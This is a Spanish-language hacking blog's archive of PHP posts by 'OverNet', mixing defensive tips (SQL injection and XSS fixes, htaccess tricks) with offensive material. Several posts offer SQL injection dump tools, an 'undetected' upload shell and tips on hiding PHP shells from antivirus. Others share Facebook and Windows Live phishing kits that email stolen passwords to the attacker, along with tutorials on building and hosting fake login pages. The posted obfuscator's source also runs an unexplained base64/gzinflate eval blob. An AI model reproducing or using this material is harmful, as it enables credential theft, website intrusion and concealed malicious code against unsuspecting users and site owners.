Mostrando entradas con la etiqueta PHP. Mostrar todas las entradas
Mostrando entradas con la etiqueta PHP. Mostrar todas las entradas

martes, 21 de enero de 2014

Arreglando bug SQL Injection PHP

2 comentarios, Publicado por OverNet en martes, enero 21, 2014 ,

Arreglando bug SQL Injection de manera rápida y sencilla

Este tutorial, va dedicado a los novatos que principalmente explotan el bug y defacean y se van sin arreglarlo.
*En este post encontraras como realizar una Inyección SQL.

Para poder arreglar el bug, necesitamos tener permisos de escritura (para los que trabajan con PHP Shells), de lo contrario este tutorial no te servirá pero sí a los webmasters que quieran evitar este tipo de ataque.

Bueno tenemos la siguiente página:

Como se puede apreciar es vulnerable a SQL Injection, observen la comilla.
Hay que tomar nota de esto, nos basamos en el archivo y la variable que se ejecuta:
http://www.avcnoticias.com.mx/bb/haxor.php?id='

* Tomamos nota *
- Directorio o carpeta:
/bb/
- Archivo vulnerable: haxor.php
- Variable vulnerabl SQLi: id=
- Lineas a modificar: 19 & 25 (Se identifican gracias al error que se imprime)

Nos vamos a nuestra PHP Shell o FTP (En caso de ser el propietario) y buscamos el Directorio (/bb/ en mi caso) y entre ella descargamos o modificamos el Archivo vulnerable (haxor.php en mi caso)

Lo editamos con el Bloc de Notas/Adobe Dreamweaver o cualquier otro editor de texto y buscamos la variable que es en nuestro caso id
(si estas en Adobe Dreamweaver CTRL + f, si estas en bloc de notas CTRL + b)
Y encontramos algo por el estilo:

Se observa claramente el código que no tiene ningún filtro de seguridad y que la variable es vulnerable a este tipo de ataques.
Ahora vamos arreglar este fallo tenemos en esta linea que se ejecuta la variable:

  1. $id=$_GET['id'];  
  2. $consulta = "SELECT * from nota where id_nota=$id";  
  3. $rs = mysql_query($consulta,$conn);  

Con la función sprintf() y mysql_real_escape_string() podemos arreglar este fallo:

  1. $consulta = sprintf("SELECT * from nota where id_nota='%s'",  
  2. mysql_real_escape_string($id));   
Y listo, sí incluimos la comilla en la variable ya no nos muestra ningún error.

martes, 18 de diciembre de 2012

Simple PHP Obfuscator

Publicado por OverNet en martes, diciembre 18, 2012 ,

PHPc0de: Obfuscation

Una herramienta simple para obfuscar o encriptar cualquier código en PHP; HTML/TXT. La finalidad de obfuscar es evitar que otras personas puedan ver el código fuente original directamente desde el archivo, para hacerlo tendrán que desencriptar el código obfuscado. 
* También se puede descodificar
Los desarrolladores web suelen proteger su código fuente o más bien dicho su propiedad intelectual obfuscando el código y así evitar que cualquier neófito pueda modificar el código a su gusto.

Code Source PHP



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!-- Coded By OverNET -->
<title>PHPc0de => Obfuscation!</title>
<center>
<h1>Obfuscar codigo PHP &amp; HTML/TXT</h1>
<? $file = $_POST['obfuscar'];
$gestor = stripslashes($file);
// Función (base64_encode(gzdeflate());
$texto = base64_encode(gzdeflate($gestor));?>

<form method="POST"><p>
<textarea name="obfuscar" cols="50" rows="10" id="xd"><? 
if($file) {
$_POST['obfuscar'];
echo $gestor;
}else{
 print 'Escriba texto o codigo';
}
?>
</textarea>
  </p>
  <p>
    <input type="submit" name="obfuscarme" value="                             Obfuscar!                           " />
  </p><b>
  <p>Texto ofuscado:</p>
  <p>
  <label for="textarea"></label>
    <textarea cols="50" rows="5" readonly="readonly" id="obfuscar"><?php if($file) {$_POST['obfuscar'];echo "<? eval(gzinflate(base64_decode('".$texto."'))); ?>";}else{
 echo 'Haga clic en el boton -Obfuscar!- para codificar!';}
?></textarea>
  </p>
</form>
<? 
## Prueba de codificación (Copyright) x3
eval(gzinflate(base64_decode('DcnNDkMwAADgx8HN/yqLg5gtaDdSHHZZrK3GT5hiok+/fdePfetB5bIdm6FemfquF+baL8rIRJmq4MOA8n6NBRAIgzWB0VjhaFqKrpRt6SUFcTJMq9xzTwjMzgF5n1JaWMKKTY/vj/bg2Yz3LSS9mdYOEnyKIQEztZ7y/4IcOxQd3orQti7oo4eSmnhkekWb0oD5LQh8X9E07fwD'))); ?>
</center>
<!-- Coded By OverNET -->

domingo, 13 de noviembre de 2011

SQL Injection Tool (Online && PHP code)

3 comentarios, Publicado por OverNet en domingo, noviembre 13, 2011 ,
Sql InyeXion Scanner F-Security Team

SQLi Tool Online

Información sobre el Autor:
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
Caracteristicas:
  • Vuln Number Found
  • Column Brute Force
  • Table Brute Force
  • Load_file()
  • Show Info Server
Download File | https://sites.google.com/site/rootnetworking/SQLI.tar
Demo Online | http://goo.gl/2WXgb

sábado, 12 de noviembre de 2011

SQLi Tool By ECEK2 & OON_BOY [PHP]

0 comentarios, Publicado por OverNet en sábado, noviembre 12, 2011 ,
SQL INJECTION TOOL BY ECEK2 & OON_BOY


SQLi Tool en PHP (Caracteristicas):
  • Find Column & Info.
  • Show DataBase.
  • Find Tables.
  • Find Columns.
  • Dump DataBase.

Demostración Online | http://goo.gl/Np1P1
Descargar archivo PHP | https://sites.google.com/site/rootnetworking/SQLiTool.php

sábado, 15 de octubre de 2011

Simple Upload Shell by Neutralise - PHP

3 comentarios, Publicado por OverNet en sábado, octubre 15, 2011 ,
Simple Upload Shell coded by Shang1 & Neutralise

Un sencillo upload de archivos.

Simple Upload Shell By Neutralise && Shang1

Características de la Shell:
  • Upload de archivos
  • Directory File View
  • Type: PHP/XHTML
  • Undetected
  • Size: 4.00 Kb
Download File | https://sites.google.com/site/rootnetworking/simple_upload.php

sábado, 1 de octubre de 2011

Comprobar si el servidor web esta caído - PHP Code

1 comentarios, Publicado por OverNet en sábado, octubre 01, 2011 ,
Comprobar si el servidor o script esta caído

PHP SCRIPT
Saber si el servidor en realidad esta caído o es nuestra pc o conexión de internet.
Servidor caido
Autor: HielaSangre (Daniel Godoy)
Programación: PHP

<html>
<head>
<style>
body
    {
    background-color:#FFF;  
    font-family: Verdana;
    color: #000;
    }
input{
      -moz-border-radius: 3px;
      font-family: Verdana;
      background-color: #FFF;
      border: 1px solid #CCC;
      color: #000;
      font-size: 25px;
      margin: 3px;
      padding: 3px;
     }
#sin_borde
          {
           border-width:0;
           cursor:pointer;
           display:block;
           font-family: Verdana;
          }
td
  {
    font-size: 25px;
    font-family: Verdana;
  }
</style>
<title>Averigua si un servidor esta caído o eres tu!</title>
</head>
<body>
<center>
<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
*  This program is free software: you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation, either version 3 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
**/
set_time_limit(0);
$url=htmlentities($_POST['url']);
if(isset($url)&&($url!= ""))
                            {
                            $online = @fsockopen($url, 80);
                            if ($online)
                                        {
                                         echo '¡Eres tú, <a href="http://'.$url.'" target=_blank>'.$url.'</a> está funcionando ok!
                                              <br><a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a>
                                              ';
                                        } else {
                                                echo '¡No, no eres tú! <a href="http://'.$url.'" target=_blank>'.$url.'</a> está caído.
                                                <br><a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a>
                                                ';
                                               }
                            }else{
                                 echo '
                                       <form name="pr" action="" method="post">
                                       <table align="center">
                                       <td>¿<input id="boton" type="text" name="url" size="15" maxlength="300" value=""/> ESTA CAIDO..</td>
                                       <td></td>
                                       <td><input type="submit" name="submit" id="sin_borde"  value="O SOY YO?" /></td>
                                       </table>
                                      ';
                                 }



?>
</center>
</body>
</html>

sábado, 3 de septiembre de 2011

SCAM de Facebook y Windows Live - password validos sin CURL - By l0ve

20 comentarios, Publicado por OverNet en sábado, septiembre 03, 2011 ,
Aclaro que estos SCAMS no fueron modificados ni creados por mí, tampoco soy responsable de que un visitante haga con esta información.

Autor: l0ve
Tipo: PHP/XHTML
Objeto (s): SCAM (Facebook & Windows Live)

¿Diferencia en este a un SCAM común?
Autentificación:
Envía logs al email del atacante:
CURL: No (No es necesario tener activado CURL en el archivo PHP.ini)
Archivo (s)/Code (s): 2 (index.php y login.php)
Autoconfigurable: (Desde el código login.php)

Según el autor escribió esto al inicio:
Bueno les traigo este code que solo acepta password validos de Facebook! .. además de eso enviá un formulario y autentifica como si nada hubiera pasado así disminuyendo las sospechas y con muchos más
buenos resultados .. también tiene unas configuraciones simples para que los logs se envíen al email, se escriban en un archivo o ninguna de las opciones .. cambiar el nombre del log etc .. todo se configura en el code. bueno son dos archivos que tienen que subir al servidor (index.php y login.php) y sobre todo no bloquea la cuenta!, sin más que decir acá les dejo el code:

SCAM Facebook
SCAM Facebook sin CURL (Imagen de l0ve)

viernes, 29 de julio de 2011

Web Antivirus - Sistema de Antivirus Web

1 comentarios, Publicado por OverNet en viernes, julio 29, 2011 ,
Hi-Coder Web Antivirus
Hi-Coder Web Antivirus es una herramienta de seguridad web dedicada a los webmasters que nos permite detectar cualquier tipo de codigo malicioso como las PHP Shells, Backdoors y sin embargo, también nos ayuda a detectar cualquier clase de bugs en PHP Scripts así como RFI, LFI, SQL injection, XSS, etc.

Screenshots:
Hi-Coder Antivirus Web
Hi-Coder Antivirus Web: Scan - Results
Hi-Coder Antivirus - Virus and bugs no found

miércoles, 27 de julio de 2011

Ofuscar una PHPShell (Indetectar Codigo fuente)

1 comentarios, Publicado por OverNet en miércoles, julio 27, 2011 ,
¿Como hacer indetectable una PHP Shell?  
(FUD a los Antivirus)

PHP-SHELL Imagen logo
Para los que no saben que es una PHP Shell (En definición a "Defacement").
PHP Shell o Shell PHP es un programa o script desarrollado íntegramente en PHP. Su principal función es la posibilidad de ejecutar los famosos shell-commands en el servidor donde se encuentre.
Algunos tienen bastas funciones, como la de explorar los directorios en el servidor en que se encuentre, crear archivos y eliminar, crear directorios y eliminar, editar archivos en texto plano, establecer una conexión MySQL, PostgreSQL u Oracle, establecer una conexión con NetCat, cambiar permisos a los elementos del servidor, etc.
(Fuente | Wikipedia)

Teniendo en cuenta que ya cualquier PHPShell es detectada por los antivirus, sin embargo, los servidores escanean este tipo de Scripts en sus sitios web, y muy difícil que el atacante pueda ejecutar la PHP Shell.
La Shell C99 es detectada por todos los antivirus, sin embargo, existe la base64 c99 que es la misma versión unicamente ofuscada en Base 64 y es FUD (Indetectable).

domingo, 24 de julio de 2011

String a Hexadecimal [PHP Code]

0 comentarios, Publicado por OverNet en domingo, julio 24, 2011 ,
String to Hex Tool
Convierte una cadena a hexadecimal.

Str - Hex (String - Hexadecimal)
Codigo PHP
<?
// Función PHP
$string = $_POST['pagina'];
function string2hexa($str)
{
    $hex='';
    for ($i=0; $i < strlen($str); $i++)
    {
        $hex .= dechex(ord($str[$i]));
    }
    return $hex;
}
?>
<!-- Formulario HTML -->
<form name="form1" method="post" action="">
    <label for="pagina"></label>
    <input name="pagina" type="text" id="pagina" value="<?php echo $string;?>">
  <p>
    <input type="submit">
  </p>
</form>
<?
### RootNetworking ###
echo '0x'.string2hexa($string);
?>

Fuente | Asnippet

viernes, 8 de julio de 2011

Port Scanner [PHP]

0 comentarios, Publicado por OverNet en viernes, julio 08, 2011 ,
Port Scanner en PHP
Como el nombre del titulo lo dice, es un Escáner de puertos (Comprueba si un puerto esta abierto o cerrado).
Escáner de puertos (Online PHP)
Una pequeña herramienta programada en PHP, sin embargo, se desconoce el nombre del autor.
Lo he probado en localhost y funciona a la perfección.

viernes, 1 de julio de 2011

Evitar XSS/Html Injection en formularios [PHP] Básico

5 comentarios, Publicado por OverNet en viernes, julio 01, 2011 ,
Un pequeño tutorial sobre como evitar XSS y/o Html Injection en formularios PHP (Básico)

¿Que es XSS? (Wikipedia)

XSS, del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.


¿Qué es HTML Injection? (Otras fuentes)

Inyección de HTML se refiere a la inserción de código HTML en una respuesta de servidores web de alterar el contenido al usuario final. Esto es también conocido como Cross Site Scripting.

No explicaré sobre la explotación de este bug, ya que solo vamos explicar sobre como evitarla y no ser victima de alguna persona malintencionada.
Un ejemplo sencillo:
Código Java Script inyectado en un input (Alert en JS)
Codigo Java Script en la barra de direcciones


En la imagen de arriba se observa, que en un formulario (Input) se logró inyectar un codigo Java Script y al ser ejecutada nos muestra una ventana diciendo "Owned by Benito Bodoke!" (una alerta).

miércoles, 29 de junio de 2011

Online Mult MD5 Hash Cracker [PHP]

7 comentarios, Publicado por OverNet en miércoles, junio 29, 2011 ,
MD5 Hash Cracker (Online)

¿Que es MD5 Hash?
Es un algoritmo de reducción criptográfico de 128 bits ampliamente usado.
(Segun Wikipedia)

MD5 Hash Logo (md5() function)

Muchos de los problemas que tienen los defacers, es que al encontrarse con una cadena enciptada en MD5 Hash (Contraseña), es muy casí imposible que el atacante pueda desifrarla sin herramientas o alguna clase de herramienta de fuerza bruta.

domingo, 26 de junio de 2011

Admin Panel Finder - By Neutralised [PHP]

6 comentarios, Publicado por OverNet en domingo, junio 26, 2011 ,
SC Admin Panel Finder - Coded by Neutralised [PHP]
Les dejo el Código Fuente de un "Admin Panel Finder" programado por Neutralised. Cabé mencionar que esta hecho en PHP, y su objetivo de esta sencilla herramienta es encontrar el directorio o archivo en la que se encuentre un sistema de logueo.

Les dejo una imagen de como funciona esta herramienta:

Admin Panel Finder by Neutralise

sábado, 25 de junio de 2011

Top 5 trucos útiles para .htaccess

0 comentarios, Publicado por OverNet en sábado, junio 25, 2011 ,
5 Interesantes trucos para .htaccess
Una interesante lista de trucos útiles para Htaccess.

1) Remover los WWW:
RewriteEngine On
RewriteCond %{HTTP_HOST} !^your-site.com$ [NC]
RewriteRule ^(.*)$ http://your-site.com/$1 [L,R=301]

2) Anti-Hotlink (Evita que otro sitio coloque imágenes de tu propio servidor web, además ahorrándote más banda ancha).
RewriteEngine On
#Replace ?mysite\.com/ with your blog url
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
#Replace /images/nohotlink.jpg with your "don't hotlink" image url
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

martes, 24 de mayo de 2011

Tutorial - Subir archivos de un scam a un servidor web

44 comentarios, Publicado por OverNet en martes, mayo 24, 2011 ,
Debido, a que muchos usuarios (Blogs y Youtube) me han pedido que coloque un video que muestre, como subir un scam a un servidor publico web.

Debido a la falta de tiempo, no he podido realizar tal vídeo. Por lo cual, les hice este tutorial hecho en texto plano con imágenes.

En el siguiente tutorial, unicamente, explicare como subir archivos  utilizando un cliente FTP (Filezilla). Si alguien le interesa, dejo el link del tutorial de como Crear un Scam utilizando adobe dreamweaver.

A continuación, les dejo otro link (por si acaso) si necesitan usar otros hostings gratuitos como referencia.
http://www.php-hispano.net/hostings
NOTA: El administrador, o autor de esta publicación no se hace responsable en la que un visitante haga con esta información, recuerde que esta publicación solo fue hecho para un fin educativo.

NOTA 2: Todos los hostings gratuitos borrarán el contenido y sus cuentas, siempre lean los términos y condiciones.

lunes, 18 de abril de 2011

[Tutorial] Crear cualquier SCAM (Fake login) en PHP con Dreamweaver

629 comentarios, Publicado por OverNet en lunes, abril 18, 2011 ,
 Antes de continuar con el tutorial, quiero dejar muy claro las definiciones de cada una que vamos
a tocar en este tema; Phishing y/o Scam.

¿Qué es el phishing scam? Es un conjunto de técnicas y mecanismos empleados por los intrusos o hackers con el propósito de robar información personal de un usuario y poder Suplantar su Identidad.

Phishing

El phishing scam consiste en la capacidad por parte de un intruso de duplicar una página Web para hacer creer al
usuario que se encuentra accediendo a la página Web original de su correo electrónico, institución financiera, tienda departamental, institución académica, etc., y no a una página Web falsa alojada en un servidor controlado por él.
Una vez que el intruso tiene implementado el sitio Web falso en Internet, comienza a realizar el envió masivo de correos electrónicos a una infinidad de direcciones de correo. Los correos electrónicos, en su tema y cuerpo del mensaje, usualmente hacen referencia a que el usuario debe acceder al sitio Web de la organización en cuestión (correo electrónico, institución financiera, tienda departamental, etc.) y realizar cambios a su información personal. Los correos electrónicos contienen la dirección Web a la cual el usuario debe acceder para realizar los cambios que se le pide, pero es importante señalar que esta dirección hace referencia al sitio Web falso implementado por el intruso.